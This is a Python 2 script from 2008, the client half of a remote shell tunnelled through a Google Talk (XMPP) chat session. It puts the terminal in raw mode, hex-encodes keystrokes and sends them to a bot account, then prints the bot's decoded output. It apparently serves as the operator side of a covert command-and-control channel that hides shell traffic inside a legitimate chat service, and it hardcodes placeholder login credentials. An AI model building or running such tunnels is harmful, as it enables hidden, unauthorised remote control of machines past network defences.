#!/usr/bin/env python
# Shell with TTY through a GTalk (jabber) session
# client part
# devloop.lyua.org april 2008
import sys,termios,pty,socket,select,os
import xmpp

login = 'leet.master' # @gmail.com
pwd   = 'm4st3rp4ss'

bot="robot@gmail.com" # complete address of the account used by the bot

def messageCB(conn,mess):
    text=mess.getBody()
    user=mess.getFrom().getNode()
    if user==bot.split("@")[0]:
      if text!=None:
        sys.stdout.write(text.decode("hex_codec"))
        sys.stdout.flush()

def StepOn(conn):
    try:
        conn.Process(1)
    except KeyboardInterrupt: return 0
    return 1

def GoOn(conn):
    while StepOn(conn): pass

cnx = xmpp.Client('gmail.com',debug=[])
cnx.connect( server=('talk.google.com',5223) )
cnx.auth(login,pwd)
cnx.RegisterHandler('message',messageCB)
cnx.sendInitPresence()
print "Connected"

prefs=termios.tcgetattr(sys.stdin.fileno())
new=prefs
new[3]=new[3] & ~(termios.ECHO|termios.ICANON|termios.IEXTEN|termios.ISIG)
new[0]=new[0] & ~termios.ICRNL
new[6][termios.VMIN]=0
new[6][termios.VTIME]=0
termios.tcsetattr(sys.stdin.fileno(),termios.TCSANOW,new)
try:
  pid=os.fork()
  if pid!=0:
    GoOn(cnx)
  else:
    buff=""
    while True:
      inputready,outputready,exceptready = select.select([sys.stdin],[],[],0.5)
      if inputready==[]:
        if buff!="":
          cnx.send( xmpp.Message(bot,buff.encode("hex_codec")) )
          buff=""
      else:
        buff+=sys.stdin.read(1)

except (IOError,socket.error):
  pass
finally:
  termios.tcsetattr(sys.stdin.fileno(),termios.TCSANOW,prefs)
  os.system("stty echo icanon iexten isig")
